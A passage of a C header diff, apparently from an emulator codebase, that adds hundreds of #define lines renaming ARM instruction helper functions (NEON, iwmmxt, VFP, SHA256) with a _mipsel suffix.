gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mipsel +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mipsel +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mipsel +#define gen_helper_double_saturate gen_helper_double_saturate_mipsel +#define gen_helper_exception_internal gen_helper_exception_internal_mipsel +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mipsel +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mipsel +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mipsel +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mipsel +#define gen_helper_get_user_reg gen_helper_get_user_reg_mipsel +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mipsel +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mipsel +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mipsel +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mipsel +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mipsel +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mipsel +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mipsel +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mipsel +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mipsel +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mipsel +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mipsel +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mipsel +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mipsel +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mipsel +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mipsel +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mipsel +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mipsel +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mipsel +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mipsel +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mipsel +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mipsel +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mipsel +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mipsel +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mipsel +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mipsel +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mipsel +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mipsel +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mipsel +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mipsel +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mipsel +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mipsel +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mipsel +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mipsel +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mipsel +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mipsel +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mipsel +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mipsel +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mipsel +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mipsel +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mipsel +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mipsel +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mipsel +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mipsel +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mipsel +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mipsel +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mipsel +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mipsel +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mipsel +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mipsel +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mipsel +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mipsel +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mipsel +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mipsel +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mipsel +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mipsel +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mipsel +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mipsel +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mipsel +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mipsel +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mipsel +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mipsel +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mipsel +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mipsel +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mipsel +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mipsel +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mipsel +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mipsel +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mipsel +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mipsel +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mipsel +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mipsel +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mipsel +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mipsel +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mipsel +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mipsel +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mipsel +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mipsel +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mipsel +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mipsel +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mipsel +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mipsel +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mipsel +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mipsel +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mipsel +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mipsel +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mipsel +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mipsel +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mipsel +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mipsel +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mipsel +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mipsel +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mipsel +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mipsel +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mipsel +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mipsel +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mipsel +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mipsel +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mipsel +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mipsel +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mipsel +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mipsel +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mipsel +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mipsel +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mipsel +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mipsel +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mipsel +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mipsel +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mipsel +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mipsel +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mipsel +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mipsel +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mipsel +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mipsel +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mipsel +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mipsel +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mipsel +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mipsel +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mipsel +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mipsel +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mipsel +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mipsel +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mipsel +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mipsel +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mipsel +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mipsel +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mipsel +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mipsel +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mipsel +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mipsel +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mipsel +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mipsel +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mipsel +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mipsel +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mipsel +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mipsel +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mipsel +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mipsel +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mipsel +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mipsel +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mipsel +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mipsel +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mipsel +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mipsel +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mipsel +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mipsel +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mipsel +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mipsel +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mipsel +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mipsel +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mipsel +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mipsel +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mipsel +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mipsel +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mipsel +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mipsel +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mipsel +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mipsel +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mipsel +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mipsel +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mipsel +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mipsel +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mipsel +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mipsel +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mipsel +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mipsel +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mipsel +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mipsel +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mipsel +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mipsel +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mipsel +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mipsel +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mipsel +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mipsel +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mipsel +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mipsel +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mipsel +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mipsel +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mipsel +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mipsel +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mipsel +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mipsel +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mipsel +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mipsel +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mipsel +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mipsel +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mipsel +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mipsel +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mipsel +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mipsel +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mipsel +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mipsel +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mipsel +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mipsel +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mipsel +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mipsel +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mipsel +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mipsel +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mipsel +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mipsel +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mipsel +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mipsel +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mipsel +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mipsel +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mipsel +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mipsel +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mipsel +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mipsel +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mipsel +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mipsel +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mipsel +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mipsel +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mipsel +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mipsel +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mipsel +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mipsel +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mipsel +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mipsel +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mipsel +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mipsel +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mipsel +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mipsel +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mipsel +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mipsel +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mipsel +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mipsel +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mipsel +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mipsel +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mipsel +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mipsel +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mipsel +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mipsel +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_mipsel +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mipsel +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mipsel +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mipsel +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mipsel +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mipsel +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mipsel +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mipsel +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mipsel +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mipsel +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mipsel +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mipsel +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mipsel +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mipsel +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mipsel +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mipsel +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mipsel +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mipsel +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mipsel +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mipsel +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mipsel +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mipsel +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mipsel +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mipsel +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mipsel +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mipsel +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mipsel +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mipsel +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mipsel +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mipsel +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mipsel +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mipsel +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mipsel +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mipsel +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mipsel +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mipsel +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mipsel +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mipsel +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mipsel +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mipsel +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mipsel +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mipsel +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mipsel +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mipsel +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mipsel +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mipsel +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mipsel +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mipsel +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mipsel +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mipsel +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mipsel +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mipsel +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mipsel +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mipsel +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mipsel +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mipsel +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mipsel +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mipsel +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mipsel +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mipsel +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mipsel +#define gen_helper_neon_tbl gen_helper_neon_tbl_mipsel +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mipsel +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mipsel +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mipsel +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mipsel +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mipsel +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mipsel +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mipsel +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mipsel +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mipsel +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mipsel +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mipsel +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mipsel +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mipsel +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mipsel +#define gen_helper_pre_hvc gen_helper_pre_hvc_mipsel +#define gen_helper_pre_smc gen_helper_pre_smc_mipsel +#define gen_helper_qadd16 gen_helper_qadd16_mipsel +#define gen_helper_qadd8 gen_helper_qadd8_mipsel +#define gen_helper_qaddsubx gen_helper_qaddsubx_mipsel +#define gen_helper_qsub16 gen_helper_qsub16_mipsel +#define gen_helper_qsub8 gen_helper_qsub8_mipsel +#define gen_helper_qsubaddx gen_helper_qsubaddx_mipsel +#define gen_helper_rbit gen_helper_rbit_mipsel +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mipsel +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mipsel +#define gen_helper_recps_f32 gen_helper_recps_f32_mipsel +#define gen_helper_rintd gen_helper_rintd_mipsel +#define gen_helper_rintd_exact gen_helper_rintd_exact_mipsel +#define gen_helper_rints gen_helper_rints_mipsel +#define gen_helper_rints_exact gen_helper_rints_exact_mipsel +#define gen_helper_ror_cc gen_helper_ror_cc_mipsel +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mipsel +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_mipsel +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mipsel +#define gen_helper_sadd16 gen_helper_sadd16_mipsel +#define gen_helper_sadd8 gen_helper_sadd8_mipsel +#define gen_helper_saddsubx gen_helper_saddsubx_mipsel +#define gen_helper_sar_cc gen_helper_sar_cc_mipsel +#define gen_helper_sdiv gen_helper_sdiv_mipsel +#define gen_helper_sel_flags gen_helper_sel_flags_mipsel +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mipsel +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mipsel +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mipsel +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mipsel +#define gen_helper_set_rmode gen_helper_set_rmode_mipsel +#define gen_helper_set_user_reg gen_helper_set_user_reg_mipsel +#define gen_helper_shadd16 gen_helper_shadd16_mipsel +#define gen_helper_shadd8 gen_helper_shadd8_mipsel +#define gen_helper_shaddsubx gen_helper_shaddsubx_mipsel +#define gen_helper_shl_cc gen_helper_shl_cc_mipsel +#define gen_helper_shr_cc gen_helper_shr_cc_mipsel +#define gen_helper_shsub16 gen_helper_shsub16_mipsel +#define gen_helper_shsub8 gen_helper_shsub8_mipsel +#define gen_helper_shsubaddx gen_helper_shsubaddx_mipsel +#define gen_helper_ssat gen_helper_ssat_mipsel +#define gen_helper_ssat16 gen_helper_ssat16_mipsel +#define gen_helper_ssub16 gen_helper_ssub16_mipsel +#define gen_helper_ssub8 gen_helper_ssub8_mipsel +#define gen_helper_ssubaddx gen_helper_ssubaddx_mipsel +#define gen_helper_sub_saturate gen_helper_sub_saturate_mipsel +#define gen_helper_sxtb16 gen_helper_sxtb16_mipsel +#define gen_helper_uadd16 gen_helper_uadd16_mipsel +#define gen_helper_uadd8 gen_helper_uadd8_mipsel +#define gen_helper_uaddsubx gen_helper_uaddsubx_mipsel +#define gen_helper_udiv gen_helper_udiv_mipsel +#define gen_helper_uhadd16 gen_helper_uhadd16_mipsel +#define gen_helper_uhadd8 gen_helper_uhadd8_mipsel +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mipsel +#define gen_helper_uhsub16 gen_helper_uhsub16_mipsel +#define gen_helper_uhsub8 gen_helper_uhsub8_mipsel +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mipsel +#define gen_helper_uqadd16 gen_helper_uqadd16_mipsel +#define gen_helper_uqadd8 gen_helper_uqadd8_mipsel +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mipsel +#define gen_helper_uqsub16 gen_helper_uqsub16_mipsel +#define gen_helper_uqsub8 gen_helper_uqsub8_mipsel +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mipsel +#define gen_helper_usad8 gen_helper_usad8_mipsel +#define gen_helper_usat gen_helper_usat_mipsel +#define gen_helper_usat16 gen_helper_usat16_mipsel +#define gen_helper_usub16 gen_helper_usub16_mipsel +#define gen_helper_usub8 gen_helper_usub8_mipsel +#define gen_helper_usubaddx gen_helper_usubaddx_mipsel +#define gen_helper_uxtb16 gen_helper_uxtb16_mipsel +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mipsel +#define gen_helper_v7m_msr gen_helper_v7m_msr_mipsel +#define gen_helper_vfp_absd gen_helper_vfp_absd_mipsel +#define gen_helper_vfp_abss gen_helper_vfp_abss_mipsel +#define gen_helper_vfp_addd gen_helper_vfp_addd_mipsel +#define gen_helper_vfp_adds gen_helper_vfp_adds_mipsel +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mipsel +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mipsel +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mipsel +#define 